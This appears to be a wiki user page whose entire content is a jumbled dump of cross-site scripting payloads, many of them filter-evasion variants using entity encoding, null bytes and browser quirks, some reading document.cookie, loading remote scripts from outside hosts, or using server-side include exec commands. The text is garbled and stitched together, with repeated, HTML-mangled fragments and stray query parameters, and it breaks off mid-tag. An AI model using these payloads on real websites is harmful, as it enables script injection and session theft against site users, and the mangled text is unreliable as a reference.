User:SarakhanO

alert(123); alert("XSS"); alert(123) alert("hellox worldss"); alert(“XSS”) alert(“XSS”); alert(‘XSS’) “> alert(“XSS”) alert(/XSS”) alert(/XSS/) alert(1) ‘; alert(1); ‘)alert(1);// alert(1)          

Xss"> ">  almeida'"> Hello!<%0dscript>alert(1337)   ·   > · "><img src=x onerror=confirm(/XSS/)> <ScRiPt>prompt(/920065/)</ScRiPt//">< <iframe/onload=alert(document.cookie)// ${pageScope}  <img src=x onerror=alert(0)> or <svg/onload=alert(0)>  '"><img src=x onerror=alert('XSS')> <iframe src=”http://target site/?param= if”> <iframe src=”http://target site/?param=if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D”>

<iframe src="http://target site"> '><h1 style="color: red;">HTML Injection Xss"><img src=x onerror=prompt(domain)>      1. ReferenceError.prototype.__defineGetter__ ('name', function{alert(1)}),x <img src=x onerror=alert('xss') />

<iframe %00 src="&amp;Tab;javascript:prompt(1)&amp;Tab;"%00>

{font-family&amp;colon;'<iframe/onload=confirm(1)>'

<input/onmouseover="javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;"

<sVg><scRipt %00>alert&amp;lpar;1&amp;rpar; {Opera}

<img/src=`%00` onerror=this.onerror=confirm(1)

<isindex formaction="javascript&amp;colon;confirm(1)"

<img src=`%00`&amp;NewLine; onerror=alert(1)&amp;NewLine;

<script/&amp;Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&amp;Tab;>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<iframe/src="data:text/html;&amp;Tab;base64&amp;Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

&amp;#34;&amp;#62;<h1/onmouseover='\u0061lert(1)'>%00

<iframe/src="data:text/html,<svg &amp;#111;&amp;#110;load=alert(1)>">

<meta content="&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)" http-equiv="refresh"/>

<script xlink:href=data&amp;colon;,window.open('https://www.google.com/')></script

<script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;>

<a href="javascript:\u0061lert&amp;#x28;1&amp;#x29;">X

<img/*%00/src="worksinchrome&amp;colon;prompt&amp;#x28;1&amp;#x29;"/%00*/onerror='eval(src)'> <img/&amp;#09;&amp;#10;&amp;#11; src=`~` onerror=prompt(1)> <iframe &amp;#09;&amp;#10;&amp;#11; src="javascript&amp;#58;alert(1)"&amp;#11;&amp;#10;&amp;#09;;>

<a href="data:application/x-x509-user-cert;&amp;NewLine;base64&amp;NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&amp;#09;&amp;#10;&amp;#11;>X</a

http://www.google<script .com>alert(document.location)</script

<a&amp;#32;href&amp;#61;&amp;#91;&amp;#00;&amp;#93;"&amp;#00; onmouseover=prompt&amp;#40;1&amp;#41;&amp;#47;&amp;#47;">XYZ</a

<img/src=@&amp;#32;&amp;#13; onerror = prompt('&amp;#49;')

<style/onload=prompt&amp;#40;'&amp;#88;&amp;#83;&amp;#83;'&amp;#41;

<script ^__^>alert(String.fromCharCode(49))</script ^__^

</style &amp;#32;><script &amp;#32; :-(>/**/alert(document.location)/**/</script &amp;#32; :-(

&amp;#00; <input type&amp;#61;"date" onfocus="alert(1)">

<textarea &amp;#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&amp;#x28;1&amp;#x29;'>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

<iframe srcdoc='&amp;lt;body onload=prompt&amp;lpar;1&amp;rpar;&amp;gt;'>

<a href="javascript:void(0)" onmouseover=&amp;NewLine;javascript:alert(1)&amp;NewLine;>X</a>

alert(0%0)

<style/onload=&amp;lt;!--&amp;#09;&amp;gt;&amp;#10;alert&amp;#10;&amp;lpar;1&amp;rpar;>

<///style///> <span %2F onmousemove='alert&amp;lpar;1&amp;rpar;'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&amp;Tab;prompt(1)

&amp;#34;&amp;#62; {-o-link-source&amp;colon;'<body/onload=confirm(1)>'

&amp;#13;<blink/&amp;#13; onmouseover=pr&amp;#x6F;mp&amp;#116;(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert&amp;#x28;1&amp;#x29;'>^__^

<div/style="width:expression(confirm(1))">X  {IE7}

<iframe/%00/ src=javaSCRIPT&amp;colon;alert(1)

//<form/action=javascript&amp;#x3A;alert&amp;lpar;document&amp;period;cookie&amp;rpar;><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

/ {src& #x3A;'<style/onload=this.onload=confirm(1)>' /

<a/href="javascript:&amp;#13; javascript:prompt(1)"><input type="X">

</plaintext\></|\><plaintext/onmouseover=prompt(1)

'' <script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&amp;#x28;1&amp;#x29; {Opera}

<a href="javascript&amp;colon;\u0061&amp;#x6C;&#101%72t&amp;lpar;1&amp;rpar;">

<div onmouseover='alert&amp;lpar;1&amp;rpar;'>DIV

<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

<a href="jAvAsCrIpT&amp;colon;alert&amp;lpar;1&amp;rpar;">X</a>

<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

<var onmouseover="prompt(1)">On Mouse Over

<a href=javascript&amp;colon;alert&amp;lpar;document&amp;period;cookie&amp;rpar;>Click Here</a>

<img src="/" =_=" title="onerror='prompt(1)'">

<%

<script src="data:text/javascript,alert(1)"> <iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<input type="text" value=`` <div/onmouseover='alert(1)'>X

http://www. alert(1)</script .com

<iframe src=j&amp;NewLine;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;v&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;s&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;c&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;i&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;p&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;colon;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;l&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;e&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;28&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;1&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;%29>

<script ?>alert(1)

<iframe src=j&amp;Tab;a&amp;Tab;v&amp;Tab;a&amp;Tab;s&amp;Tab;c&amp;Tab;r&amp;Tab;i&amp;Tab;p&amp;Tab;t&amp;Tab;:a&amp;Tab;l&amp;Tab;e&amp;Tab;r&amp;Tab;t&amp;Tab;%28&amp;Tab;1&amp;Tab;%29>

<img src=`xx:xx`onerror=alert(1)>

<meta http-equiv="refresh" content="0;javascript&amp;colon;alert(1)"/> <a xlink:href="//jsfiddle.net/t846h/">click

<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs> MsgBox+1

<a href="data:text/html;base64_,<svg/onload=\u0061&amp;#x6C;&#101%72t(1)>">X</a

<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

<script/src="data&amp;colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&amp;colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

<object data=javascript&amp;colon;\u0061&amp;#x6C;&#101%72t(1)>

+-+-1-+-+alert(1)

<body/onload=&amp;lt;!--&amp;gt;&#10alert(1)>

<script itworksinallbrowsers>/*<script* */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

//&amp;NewLine;confirm(1);</script <script onlypossibleinopera:-)> alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&amp;#x3A;&#97lert(1)>ClickMe

alert(1) </script 1=2

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&amp;#x0061;&amp;#x06c;&amp;#x0065;&amp;#x00000072;&amp;#x00074;(1)>

<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x

"><img src=x onerror=window.open('https://www.google.com/');>

<button formaction=javascript&amp;colon;alert(1)>CLICKME

<a xlink:href="//jsfiddle.net/t846h/">click

<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+>

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”jav&amp;#x09;ascript:alert(‘XSS’);”> <<SCRIPT>alert(“XSS”);//<</SCRIPT> %253cscript%253ealert(1)%253c/script%253e “><s”%2b”cript>alert(document.cookie) foo alert(1) <scr ipt>alert(1)</scr ipt> <IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <BODY BACKGROUND=”javascript:alert(‘XSS’)”> <BODY ONLOAD=alert(‘XSS’)> <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert("hellox worldss") <img src="javascript:alert('XSS');"> <img src=javascript:alert(&amp;quot;XSS&amp;quot;)> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search alert("hellox worldss") &safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 alert("XSS"); &search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search hellox worldss <BODY ONLOAD=alert('hellox worldss')> <input onfocus=write(XSS) autofocus> <input onblur=write(XSS) autofocus> <body onscroll=alert(XSS)>     ...     <button formaction="javascript:alert(XSS)">lol <img src=x onerror=alert(XSS)//"> <![><img src="]><img src=x onerror=alert(XSS)//"> <img src=" <img src=x onerror=alert(XSS)//"> <? foo="> alert(1) "> <! foo="> alert(1) "> </ foo="> alert(1) "> <? foo="><x foo='?> alert(1) '>"> <! foo="[ Inception "><x foo="]foo> alert(1) "> <% foo><x foo="%> alert(123) "> <div style="font-family:'foo&amp;#10;;color:red;';">LOL LOL *{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;} ({0:#0=alert/#0#/#0#(0)}) <svg xmlns="http://www.w3.org/2000/svg">LOL alert(123)  &amp;lt;SCRIPT&amp;gt;alert(/XSS/&amp;#46;source)&amp;lt;/SCRIPT&amp;gt; \\";alert('XSS');// &amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\"XSS\");&amp;lt;/SCRIPT&amp;gt; &amp;lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt; &amp;lt;BODY BACKGROUND=\"javascript&amp;#058;alert('XSS')\"&amp;gt; &amp;lt;BODY ONLOAD=alert('XSS')&amp;gt; &amp;lt;IMG DYNSRC=\"javascript&amp;#058;alert('XSS')\"&amp;gt; &amp;lt;IMG LOWSRC=\"javascript&amp;#058;alert('XSS')\"&amp;gt; &amp;lt;BGSOUND SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt; &amp;lt;BR SIZE=\"&{alert('XSS')}\"&amp;gt; &amp;lt;LAYER SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\"&amp;gt;&amp;lt;/LAYER&amp;gt; &amp;lt;LINK REL=\"stylesheet\" HREF=\"javascript&amp;#058;alert('XSS');\"&amp;gt; &amp;lt;LINK REL=\"stylesheet\" HREF=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css\"&amp;gt; &amp;lt;STYLE&amp;gt;@import'http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css';&amp;lt;/STYLE&amp;gt; &amp;lt;META HTTP-EQUIV=\"Link\" Content=\"&amp;lt;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css&amp;gt;; REL=stylesheet\"&amp;gt; &amp;lt;STYLE&amp;gt;BODY{-moz-binding&amp;#58;url(\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xssmoz&amp;#46;xml#xss\")}&amp;lt;/STYLE&amp;gt; &amp;lt;XSS STYLE=\"behavior&amp;#58; url(xss&amp;#46;htc);\"&amp;gt; &amp;lt;STYLE&amp;gt;li {list-style-image&amp;#58; url(\"javascript&amp;#058;alert('XSS')\");}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS &amp;lt;IMG SRC='vbscript&amp;#058;msgbox(\"XSS\")'&amp;gt; &amp;lt;IMG SRC=\"mocha&amp;#58;&amp;#91;code&amp;#93;\"&amp;gt; &amp;lt;IMG SRC=\"livescript&amp;#058;&amp;#91;code&amp;#93;\"&amp;gt; žscriptualert(EXSSE)ž/scriptu &amp;lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&amp;#058;alert('XSS');\"&amp;gt; &amp;lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&amp;#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&amp;gt; &amp;lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&amp;#58;//;URL=javascript&amp;#058;alert('XSS');\" &amp;lt;IFRAME SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt;&amp;lt;/IFRAME&amp;gt; &amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=\"javascript&amp;#058;alert('XSS');\"&amp;gt;&amp;lt;/FRAMESET&amp;gt; &amp;lt;TABLE BACKGROUND=\"javascript&amp;#058;alert('XSS')\"&amp;gt; &amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=\"javascript&amp;#058;alert('XSS')\"&amp;gt; &amp;lt;DIV STYLE=\"background-image&amp;#58; url(javascript&amp;#058;alert('XSS'))\"&amp;gt; &amp;lt;DIV STYLE=\"background-image&amp;#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&amp;#46;1027\0058&amp;#46;1053\0053\0027\0029'\0029\"&amp;gt; &amp;lt;DIV STYLE=\"background-image&amp;#58; url(javascript&amp;#058;alert('XSS'))\"&amp;gt; &amp;lt;DIV STYLE=\"width&amp;#58; expression(alert('XSS'));\"&amp;gt; &amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript&amp;#58;alert(\"XSS\")';&amp;lt;/STYLE&amp;gt; &amp;lt;IMG STYLE=\"xss&amp;#58;expr/*XSS*/ession(alert('XSS'))\"&amp;gt; &amp;lt;XSS STYLE=\"xss&amp;#58;expression(alert('XSS'))\"&amp;gt; exp/*&amp;lt;A STYLE='no\xss&amp;#58;noxss(\"*//*\"); xss&amp;#58;ex&amp;#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&amp;gt; &amp;lt;STYLE TYPE=\"text/javascript\"&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt; &amp;lt;STYLE&amp;gt;&amp;#46;XSS{background-image&amp;#58;url(\"javascript&amp;#058;alert('XSS')\");}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt; &amp;lt;STYLE type=\"text/css\"&amp;gt;BODY{background&amp;#58;url(\"javascript&amp;#058;alert('XSS')\")}&amp;lt;/STYLE&amp;gt; &amp;lt;!--&amp;#91;if gte IE 4&amp;#93;&amp;gt; &amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt; &amp;lt;!&amp;#91;endif&amp;#93;--&amp;gt; &amp;lt;BASE HREF=\"javascript&amp;#058;alert('XSS');//\"&amp;gt; &amp;lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\"&amp;gt;&amp;lt;/OBJECT&amp;gt; &amp;lt;OBJECT classid=clsid&amp;#58;ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript&amp;#058;alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt; &amp;lt;EMBED SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;swf\" AllowScriptAccess=\"always\"&amp;gt;&amp;lt;/EMBED&amp;gt; &amp;lt;EMBED SRC=\"data&amp;#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&amp;gt;&amp;lt;/EMBED&amp;gt; a=\"get\"; b=\"URL(\\"\"; c=\"javascript&amp;#058;\"; d=\"alert('XSS');\\")\"; eval(a+b+c+d); &amp;lt;HTML xmlns&amp;#58;xss&amp;gt;&amp;lt;?import namespace=\"xss\" implementation=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;htc\"&amp;gt;&amp;lt;xss&amp;#58;xss&amp;gt;XSS&amp;lt;/xss&amp;#58;xss&amp;gt;&amp;lt;/HTML&amp;gt; &amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;&amp;lt;IMG SRC=\"javas&amp;#93;&amp;#93;&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;cript&amp;#58;alert('XSS');\"&amp;gt;&amp;#93;&amp;#93;&amp;gt; &amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt; &amp;lt;XML ID=\"xss\"&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=\"javas&amp;lt;!-- --&amp;gt;cript&amp;#58;alert('XSS')\"&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt; &amp;lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&amp;gt;&amp;lt;/SPAN&amp;gt; &amp;lt;XML SRC=\"xsstest&amp;#46;xml\" ID=I&amp;gt;&amp;lt;/XML&amp;gt; &amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt; &amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt; &amp;lt;?xml&amp;#58;namespace prefix=\"t\" ns=\"urn&amp;#58;schemas-microsoft-com&amp;#58;time\"&amp;gt; &amp;lt;?import namespace=\"t\" implementation=\"#default#time2\"&amp;gt; &amp;lt;t&amp;#58;set attributeName=\"innerHTML\" to=\"XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;\"&amp;gt; &amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt; &amp;lt;SCRIPT SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;jpg\"&amp;gt;&amp;lt;/SCRIPT&amp;gt; &amp;lt;!--#exec cmd=\"/bin/echo '&amp;lt;SCR'\"--&amp;gt;&amp;lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'\"--&amp;gt; &amp;lt;? echo('&amp;lt;SCR)'; echo('IPT&amp;gt;alert(\"XSS\")&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt; &amp;lt;IMG SRC=\"http&amp;#58;//www&amp;#46;thesiteyouareon&amp;#46;com/somecommand&amp;#46;php?somevariables=maliciouscode\"&amp;gt; Redirect 302 /a&amp;#46;jpg http&amp;#58;//victimsite&amp;#46;com/admin&amp;#46;asp&deleteuser &amp;lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&amp;lt;SCRIPT&amp;gt;alert('XSS')&amp;lt;/SCRIPT&amp;gt;\"&amp;gt; &amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- &amp;lt;SCRIPT a=\"&amp;gt;\" SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt; &amp;lt;SCRIPT =\"&amp;gt;\" SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt; &amp;lt;SCRIPT a=\"&amp;gt;\" '' SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt; &amp;lt;SCRIPT \"a='&amp;gt;'\" SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt; &amp;lt;SCRIPT a=`&amp;gt;` SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt; &amp;lt;SCRIPT a=\"&amp;gt;'&amp;gt;\" SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt; &amp;lt;SCRIPT&amp;gt;document&amp;#46;write(\"&amp;lt;SCRI\");&amp;lt;/SCRIPT&amp;gt;PT SRC=\"http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\"&amp;gt;&amp;lt;/SCRIPT&amp;gt; &amp;lt;A 